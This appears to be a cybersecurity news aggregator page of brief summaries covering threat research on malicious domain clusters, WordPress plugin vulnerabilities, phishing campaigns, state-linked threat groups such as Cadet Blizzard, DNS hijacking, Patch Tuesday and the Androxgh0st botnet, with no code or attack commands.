Summary: Silent Push has been investigating the FUNULL content delivery network for two years, uncovering a vast malicious domain cluster linked to various cybercriminal activities. Their findings reveal over 200,000 hostnames generated by a domain generation algorithm, with numerous suspicious indicators and artifacts identified. The research highlights the importance of monitoring such networks for threat detection and response.…
Read More
Summary: The research conducted by WhoisXML API highlights the increased cyber threats during the Thanksgiving and Black Friday seasons, revealing numerous malicious domains and IP addresses. The study identified significant numbers of email-connected domains, IP addresses, and suspicious subdomains that could serve as attack vectors. The findings emphasize the importance of vigilance during holiday shopping periods.…
Read More
Summary: As Thanksgiving approaches, cyber threat actors exploit holiday-related domains to lure victims. Recent research uncovered numerous malicious domains and IP addresses linked to Black Friday and Thanksgiving-themed cyber attacks, highlighting the need for vigilance during this shopping season. #ThanksgivingThreats #BlackFridayScams #CyberAwareness Keypoints: 318 email-connected domains identified, with one deemed malicious.…
Read More

### #WordPressSecurity #PluginVulnerabilities #WebApplicationRisks

Summary: A report has identified two critical vulnerabilities in the Anti-Spam by CleanTalk WordPress plugin, affecting over 200,000 installations and allowing unauthenticated attackers to compromise websites. Users are urged to update to the latest version to mitigate these risks.

Threat Actor: Unauthenticated Attackers | unauthenticated attackers Victim: Anti-Spam by CleanTalk Users | Anti-Spam by CleanTalk

Key Point :

Two vulnerabilities, CVE-2024-10542 and CVE-2024-10781, allow attackers to install malicious plugins and execute arbitrary code.…
Read More

### #InfrastructureSecurity #PolicyExploitation #CloudBreach

Summary: Cybersecurity researchers have revealed new attack techniques targeting infrastructure-as-code (IaC) and policy-as-code (PaC) tools, specifically HashiCorp’s Terraform and Open Policy Agent (OPA), which exploit domain-specific languages to compromise cloud platforms and exfiltrate sensitive data. Despite their enhanced security features, these tools are not immune to sophisticated attacks that leverage their inherent functionalities.…

Read More
Summary: A recent phishing campaign targeting the telecommunications and financial sectors has been identified, utilizing Google Docs to deliver malicious links that redirect victims to fake login pages hosted on Weebly. By leveraging trusted platforms, attackers evade detection and enhance user trust, leading to increased success rates.…
Read More

### #CyberSecurity #MalwareAnalysis #ThreatIntelligence Summary: Volexity’s analysis reveals a vulnerability in Fortinet’s FortiClient VPN client exploited by the Chinese state-affiliated threat actor BrazenBamboo, leading to the development of the DEEPDATA malware family. This malware is capable of extracting sensitive information, including user credentials, from compromised systems.…

Read More

Summary:

Cadet Blizzard (DEV-0586) is a Russian GRU-affiliated cyber threat group that has been active since at least 2020, primarily targeting Ukrainian government agencies and critical infrastructure. Following a series of cyberattacks during the 2022 Russian invasion of Ukraine, the group has expanded its operations to Europe and Latin America, employing sophisticated tactics for espionage and disruption.…
Read More

Summary: Over 1 million domains are potentially vulnerable to “Sitting Ducks” attacks, which exploit DNS misconfigurations to hijack domains for malicious purposes. The report by Infoblox Threat Intel highlights the simplicity of executing these attacks and the challenges in detecting them.

Threat Actor: Vipers, Hawks | Vipers, Hawks Victim: Various organizations and individuals | Various organizations and individuals

Key Point :

Over 800,000 domains remain vulnerable to hijacking, with 70,000 already compromised.…
Read More

Summary: Security researchers from Hunt.io have identified a cyber operation utilizing the Sliver command-and-control framework and Ligolo-ng tunneling tool, targeting victims by impersonating Y Combinator. The operation highlights the evolving tactics of cybercriminals leveraging trusted brands to establish credibility and evade detection.

Threat Actor: Cybercriminals | cybercriminals Victim: Y Combinator | Y Combinator

Key Point :

The attackers registered a domain mimicking Y Combinator to deflect suspicion and establish a facade of authenticity.…
Read More

Summary: Microsoft’s November 2024 Patch Tuesday addresses 91 vulnerabilities, including four critical zero-days, two of which are actively exploited. The updates include fixes for various types of flaws, such as remote code execution and elevation of privilege vulnerabilities.

Threat Actor: Unknown | unknown Victim: Microsoft | Microsoft

Key Point :

Four zero-day vulnerabilities were disclosed, two of which were actively exploited in attacks.…
Read More

Summary: This blog post discusses phishing techniques used by the threat actor 0ktapus to compromise cloud identities and outlines methods for investigating phishing campaigns. It provides a comprehensive framework for identifying phishing infrastructure and highlights the importance of ongoing vigilance in cybersecurity practices.

Threat Actor: 0ktapus | 0ktapus Victim: Various organizations | various organizations

Key Point :

0ktapus employs sophisticated phishing techniques, including smishing, vishing, and MFA fatigue, to target IT service desk workers and gain access to cloud environments.…
Read More

Summary:

CloudSEK’s Threat Research team has identified significant threats posed by the Androxgh0st botnet, which has been exploiting multiple vulnerabilities since January 2024. This botnet targets various technologies, including web servers and IoT devices, and shows signs of operational integration with the Mozi botnet. Immediate patching of vulnerabilities is recommended to mitigate risks.…
Read More